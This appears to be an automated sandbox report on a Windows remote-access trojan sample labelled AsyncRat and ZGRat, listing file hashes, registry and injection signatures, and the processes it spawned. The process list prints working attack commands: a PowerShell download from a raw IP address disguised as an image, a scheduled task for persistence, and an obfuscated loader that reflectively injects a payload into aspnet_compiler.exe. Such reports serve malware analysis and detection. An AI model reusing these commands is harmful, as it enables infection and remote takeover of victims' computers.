memory/300-207-0x0000000002C20000-0x0000000002CA0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 0f4f741a30afcd13b686313d31ceaac3 |
| SHA1 | eb341e2203992dbb28d7f3deb4a444eb042e70c1 |
| SHA256 | 42702e2d60b5d4319ff6fab128cb6585739e0de7080dd6f8ffe7502ef33d44da |
| SHA512 | c9d06a1c933cf1152e1c08f58c9894b31d1d42726177b8b0cb63ba82d771a997f4f165d42c0b1367085ce422f842b77854d79dfa577761db9aefd4fe5de89583 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | fa896589dc101569218d9554ad8cc547 |
| SHA1 | e4f98abc82cfb45b9deff5430f5bef716b2302cc |
| SHA256 | a189c451f257e9c98f98a5a0bccb0f7c0877287ce59ef240341eac9480337db0 |
| SHA512 | 681aaec310163a19cbbad82a6ce4133ffad1e2ec1ce400e5c9cb8ee65341174b5d0f4965f9321c2f9218374d3acd87349cb2e750449b2bc56b529d53476999cf |
memory/1372-223-0x0000000001D50000-0x0000000001D51000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 7559f17b255a8b1932e72a81a240096d |
| SHA1 | 386f4a21f8c8171e7c875ef809250be6633757cf |
| SHA256 | 519310fed8e699cf88dbef66e8aabeefda883555c49f50e58bd5a86bfb945eca |
| SHA512 | 8771d4599c8ac2ec316bb8e6799ea86e846a57ce4f49609b9ade73e264cbe4896d73cbd977c0195bb7e5702ef720da9cfae01b912d3aadb49a8632f88f0e888a |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PRMODDT9PNEWFNRU6KTK.temp
| MD5 | c35051a64ae0888a1ecd112759fc4fa4 |
| SHA1 | d029cd66ff74a8a6fa55d6b4addab696f6c8e97c |
| SHA256 | bd4fd9e687b305ca5db9f8359a300a7fe2eb6236a09c0360c44043097d7d860a |
| SHA512 | 7fd21af965e6dd98025567cb07397c30c0efedd2d0fc453d0943274a12227350baf58c6825db85c739a797bf1dbf7357111eebc1a5f924aac4617c85b5a97d95 |
memory/2224-232-0x00000000021D0000-0x00000000021D8000-memory.dmp
memory/2224-233-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-231-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/2224-230-0x000000001B4F0000-0x000000001B7D2000-memory.dmp
memory/2224-235-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/2224-238-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-237-0x0000000002B80000-0x0000000002C00000-memory.dmp
memory/2224-236-0x0000000002B80000-0x0000000002C00000-memory.dmp
C:\Users\Admin\Desktop\a.ps1
| MD5 | 7b064a6209f893bdd49ee27ab509e271 |
| SHA1 | d4cc84e215cd2b35a2241298d1782d7873399f72 |
| SHA256 | 9c3f6def8ce4f73c49f861a191e7e3e36f0e9759de9bda8b0f79ca895decb8c7 |
| SHA512 | 5f347947dbb13a5fc96c581308e0da8d9a217f4cc413a0c5fd0a216e1c6c96e789e7abd2ec1128a0b01ac6edf78b60097bca60b3ccff22aa89df23b168f875e2 |
memory/2224-239-0x000007FEF1360000-0x000007FEF1CFD000-memory.dmp
memory/320-246-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-247-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-245-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-248-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-249-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/320-250-0x0000000002900000-0x0000000002980000-memory.dmp
memory/320-251-0x0000000002900000-0x0000000002980000-memory.dmp
memory/2636-258-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/2636-259-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-262-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-261-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-260-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
memory/2636-263-0x0000000002DF0000-0x0000000002E70000-memory.dmp
memory/2636-264-0x000007FEF2520000-0x000007FEF2EBD000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 901e0d6f7201a7be15fb48fd447fc052 |
| SHA1 | 37142ec6982ed0d4a1785e3a6eb508c86d802a65 |
| SHA256 | f202496fa677af7806d28ca2922f268252dee7d4960b490cabe75ad0c0cd30a6 |
| SHA512 | 1e304f8de325c960f9c6c7642703fc0188ac5c91e48022e8e79d33a6e0dfcfefc86cd5fd73fd79daae647d1644160c1e93255cea10d83603227f41ccd7d0dc1b |
C:\Users\Admin\Desktop\aaa.vbs
| MD5 | 94d9f0f40db24e05f57932150c193171 |
| SHA1 | cc52620223564a1a5a8855edc9b86ef196b57be2 |
| SHA256 | 95eda985122dc3d7bc221b0fcef20eeb77503bb0bfa7fd5896fd511c4ddbb888 |
| SHA512 | edd628f6276656d0769f6b1c54e8c26efaa8b0fab334fe64df66c65cc86bb2c71b15b137c2373ac00a027841961c77f75ee712f3cd142e5fea3c6a211c6afcd0 |
C:\Users\Admin\Desktop\a.vbs
| MD5 | 3c15cc7a6587bd5a38b2f3695f5fdd70 |
| SHA1 | 5eb07663b508cc6288514b9d55c0bff2db78f679 |
| SHA256 | 6227ddc0d33925e3981078595fa50d52819b3cab35f2800bc81eb0860ad726a3 |
| SHA512 | 15bd0a4fb9c76121441b648a9256a16c5c7bcd3e7d84f36a3107934256f0b27da59c14738fd8becabee531ed0efee58feb0322ec36f277a4b3c11350f8bc3168 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-12 14:32
Reported
2024-03-12 14:35
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
AsyncRat
Detect ZGRat V1
ZGRat
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5068 set thread context of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
| PID 1448 set thread context of 880 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\g4.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source 'http://104.243.44.136:777/moh.jpg' -Destination 'C:\Users\Public\ben.zip'; Expand-Archive -Path 'C:\Users\Public\ben.zip' -DestinationPath 'C:\Users\Public\' -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "Start-BitsTransfer -Source 'https://nodejs.org/download/release/v6.17.1/win-x64/node.exe' -Destination 'C:\Users\Public\node.exe'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\\Users\\Public\\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\shell.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\install.js
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\\Users\\Public\\app.js"
C:\Users\Public\node.exe
"C:\Users\Public\node.exe" C:\Users\Public\run.js
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /s /c "powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command "Function OF([String] $gswt5) {$JS = [System.Collections.Generic.List[Byte]]::new();for ($i = 0; $i -lt $gswt5.Length; $i +=8) {$JS.Add([Convert]::ToByte($gswt5.Substring($i, 8), 2));}return [System.Text.Encoding]::ASCII.GetString($JS.ToArray());}Function User {param($x3losh)$x3losh = $x3losh -split '(..)' | ? { $_ };ForEach ($JSEYHESSS325 in $x3losh){[Convert]::ToInt32($JSEYHESSS325,16);}}$gswt5 = (Get-Content -Path 'C:\Users\Public\msg.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$eyaw = (Get-Content -Path 'C:\Users\Public\runpe.dll' -Raw) -replace '%','0' -replace '!','1' -replace '@','A';$awayz = (Get-Content -Path 'C:\Users\Public\load.dll');$type = (Get-Content -Path 'C:\Users\Public\type.dll');$aeuyu = OF(Get-Content -Path 'C:\Users\Public\xx.dll');$eyksw = (Get-Content -Path 'C:\Users\Public\method.dll');$eeyuki = OF(Get-Content -Path 'C:\Users\Public\Execute.dll');$invoke = (Get-Content -Path 'C:\Users\Public\invoke.dll');$Framework = OF(Get-Content -Path 'C:\Users\Public\Framework.dll');$i = 0;while ($true) {; try {;[Byte[]]$JR = User $gswt5;[Byte[]]$YJSWU = User $eyaw; break; } catch {; };};[Reflection.Assembly]::$awayz($YJSWU).$type($aeuyu).$eyksw($eeyuki).$invoke($null,[object[]] ($Framework,$null,$JR,$true)); & Stop-Process -Name 'node'"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Network
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_elsa5muu.rlm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Public\basta.js
| MD5 | 38affda935585ad2ddc0abe0a906f404 |
| SHA1 | 8379070ec3e9b448499c53c6244c815bc566cf59 |
| SHA256 | f1c6fbb11607690d7de83308bb65b7fdd0679591c2fc5bc927820b654a483eaa |
| SHA512 | 0520a8d53a2bc686a87c530680afa2f12eab198316e3d7419f472515bac0b0d2a3c891b0e4f3112b1f382d799f4655aa06624c57f06c2bc1cc3161ff06aeced6 |
C:\Users\Public\node.bat
| MD5 | f6a91f8aa7612ef8d9f2887fd909600a |
| SHA1 | 948ac8197a43a5e50ed34241f3d74bba0222b9c7 |
| SHA256 | dd9a0df1cefd595c2b9a0cceb0a0042451b496d3c5753e2a33520de646c9ddf3 |
| SHA512 | 666339156dd8924df33adc3e0a266d2048f0e9b9ef201cedfe304ae37c99a45674abd4bf97a94ea3eb81e5d7a98f399d9770cad5dca16bf5852a692460d855ef |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | e5ab5d093e49058a43f45f317b401e68 |
| SHA1 | 120da069a87aa9507d2b66c07e368753d3061c2d |
| SHA256 | 4ec6d8e92ffc5b2a0db420e2d031a2226eef582d5e56d5088fc91bba77288e74 |
| SHA512 | d44361457713abd28c49f9aa4043b76882e2b5e626816267cf3d79454c48980ba6207333f23b7976b714e090c658db36a844cb27cd6a91615014f3b06ef5623a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9431378551c6d63789f4bc499aef072 |
| SHA1 | 70455c2f065fc4475f1e620defa3c60ed0444399 |
| SHA256 | 820bdd78e27f4a51dd4e759bac5d52687ec0125978bb8ae90e46e6e6df53f452 |
| SHA512 | 1e6eadc7fa53883c242a4df34ee2645c617ce26b64d1dbb87f3d532fe7c582bf47ea748a01a524d1441cb1a487abbb098e3c01a4d94b8b98c4793ecfa8a9ca15 |
C:\Users\Public\shell.js
| MD5 | 3c93270c5a82e51379c4eaa91cd697d5 |
| SHA1 | 250fb007cc2b58cb67bb8c4a8b9d6f2308cc78b7 |
| SHA256 | 825858c8524555771bd602ce6a304e10144b5ec7b1f9249aef5aa5a667771e1c |
| SHA512 | ee4a491f1c4cee10bbd15a5a1f26aa16af3b3e504cb9860904b3d21d82261d739c31adbaccda44cc6107d786f84ca2ad7eeeac64c5496a257ff3c04d435c960f |
C:\Users\Public\app.js
| MD5 | 08a7e6db996774b6806c395c04116803 |
| SHA1 | d0182c34dacc8ab9c8841c8913a1ae7f4d281595 |
| SHA256 | 9268b265b1de1e39454bc0276b85e56e3e1763526a972bfc60a3bbb533192bdc |
| SHA512 | d3191ac299738e2b01edda769da6462df9f292bfe033cc26aeb317d47e04948d56e52eeef19c1d82c31e8f213c7547504e42f354c4c417b9e17aec7c6154e43b |
C:\Users\Public\run.js
| MD5 | 166e57b73fd399b0f54c415d22b235f6 |
| SHA1 | f20bf715826dc97a5e26c7acc4310d32213cc2b7 |
| SHA256 | f7741744738c58c8cd5b1b8bc756860a68a8b3378576c421f0f597edf29f5df3 |
| SHA512 | e2a32241f607f0b6842ca2546002ad086035161249bd2dd3bf04a05dcbf6ad660ef91d23507c0f0c983769ade7d73d0b627b8c16c31954e607b4261b89979eda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3d5dc472de2b37146b21b63a3173176d |
| SHA1 | 7d3dd1e9a91c497745e965b4fdbbeac28196ab45 |
| SHA256 | 75edb4ad9fc3331ff2d78383ae18095cb8163bdffaaa64e6593283bb7a17c3bb |
| SHA512 | 74bf3f56b6a31fb8745c27dd8a32a97c3923d08e76fb267ebf73bb9e7e901070ee2695437af17c4b4fad583a7591c454bd8cfd0fd7ef9e7b2691d1487f0cb1bb |
C:\Users\Public\msg.dll
| MD5 | 55a2ab1987b5dc68a293d870ff989008 |
| SHA1 | e170596b7a86e216f23f9e0187e460447f63a88f |
| SHA256 | c80df95873d89cfe623decf1e71a7b53afd7771ddf97256e59c1a848253fbb64 |
| SHA512 | ccdfe15c5daab738a889e6405a1c6daf76bcaeb651e04fa9d148b5078707c4ba2c56f8b540227d61bfda4c93b0b33487becb29c7916ac03d8c48ac0e9970e5e4 |
C:\Users\Public\runpe.dll
| MD5 | ab3151ce426cf5959813a90f452750b8 |
| SHA1 | 271198005f634f22c0f84358a00b7aff302e712b |
| SHA256 | a9e0964b0bcbd52e1344af7f25977128860f81eb3173fcdc8f00d448a6e6e578 |
| SHA512 | 5ff0856cbfc649f89ae7e1997d819b2d6593a56c36758bf45f1e59ac74fe8599007b08752b76424f9eb540af87bc89c1fa58bbf81b9967fc3c6fff897ec0975b |
C:\Users\Public\xx.dll
| MD5 | 14c2a6b7bf15e15d8dae9cd4a56432d5 |
| SHA1 | 0d00aa5d547ea7e6f7283221e5f3b0cc91cc6016 |
| SHA256 | 79891821778c4ca9358c27e7fb66b0442a2921b661df1293e398b18d81da5d96 |
| SHA512 | e476851faf540c3679225de2b224d64d117fa1857a4db7b34714d0154b8ba5ebaab50e1a6b0578759b7572e89e3df4d0d4112a7e4f5b81230931cfe6b651c63d |
C:\Users\Public\type.dll
| MD5 | be784e48d0174367297b636456c7bcf1 |
| SHA1 | 8c906d9e0e2439238b3263e087aee3d98fa86dea |
| SHA256 | 510760f4c6f7fb3b5b332cd7d3a2f674235b0f58d77dbc3972adaf682a168136 |
| SHA512 | aed58d8904742a672f9ba339069004a1c0339e6481a8949de14ee8bf2afef43f8e18e55ba4a6854a7950ee355675c26b46120e500472deaf0986f68451442ae4 |
C:\Users\Public\load.dll
| MD5 | f19dbf2edb3a0bd74b0524d960ff21eb |
| SHA1 | ddcb77ff769ea54ca622848f6bedd4004fa4f4fa |
| SHA256 | 8a6bdb6b18da586fe7f2acbd8f1055533f2cd97a3681b3652bcd712224df45c3 |
| SHA512 | f0419117db6330f52eba6e7ef08a5cb096fdb02a40b1dfe4f28dd57791a11b6753e4db0fb63e1c4a22293584dc61908a8e2e99dc59a07f805e097c723329d216 |
C:\Users\Public\method.dll
| MD5 | 38b97710070dbdd7b3359c0d52da4a72 |
| SHA1 | 4ce08d2147c514f9c8e1f83d384369ec8986bc3b |
| SHA256 | 675f06af4e7f254d55ac605bbd7da45d9e00207a97f8a8ab7bb747d512776bc7 |
| SHA512 | b11cec0f21dec871163d6c254850d3f807ecc4ae726b143a0c4667a25c3a3fe9283aee3f6850a2389fdce3d20f41d9c3d30f4768171137d6bdc1355a2116189c |
C:\Users\Public\Framework.dll
| MD5 | 6a08392ecf95df7fc91917dcfaae8da6 |
| SHA1 | 480f6a5c761e1a069c0d68f5ac2aabf727791393 |
| SHA256 | 0a572ee5508d9310936801a04237d56f118dff4dbaa98f60070988cc4b8ca460 |
| SHA512 | d70c436183a9c6f6d4ce9296dce846f94cd12d7fbb76b24e59d88a77349a95a7a0d6ad8f9f4ffc32a98618b3250e0d35e4cf9ff1e711f4e63ffee425597dfc5e |
C:\Users\Public\invoke.dll
| MD5 | b9376e9e3c4d48f5e35a3f355ae1f74a |
| SHA1 | c65605adf5270f5065089b0189da542274d30db0 |
| SHA256 | 90092e5fb861dd4ff34fa20f4b31ca44ebbb3bc367a8d7a35b89a7f89c793fa9 |
| SHA512 | 5560101edb289c4a86476bce55648324ef188ff1e2d879a1a3bc10c1298aa643255c35d16a984f30d624fe9a87306304eaa14179863001ddd6e264e8bba17591 |
C:\Users\Public\Execute.dll
| MD5 | 529cf04db0f736467c7583ea80c3aa66 |
| SHA1 | 7628148337b1d3d700c8151f76a1595b6f5123b8 |
| SHA256 | 67642e56281bc4aa846689bc725f8fcc76e61c20831aa4f7e2e0c8cdba17e520 |
| SHA512 | f612b12e1a7c2021f6c2723fe57f23aba3d1b6588f080dd67e48dc44eeaf88455e4bc6bf9caed088c63c3fb019ad8696eeb44e7bb09f8c81638779f4658ef6d4 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8a3a11baeb69c919d9e6a93ff4353155 |
| SHA1 | d926b5b919307fb37e39b94550c98922533e23e5 |
| SHA256 | 052ccf5c0687f85f7eb792a6425134ca99308252992cb59862bc063d100bac9c |
| SHA512 | c6f857e401490c2bbe5e6493e4834b89fa5b73909bf51c2c5aee8b26a456834cac32fe93a669646a8538cb1290673e875dfc2154bcf3a99117ef6bc6bfe3dda9 |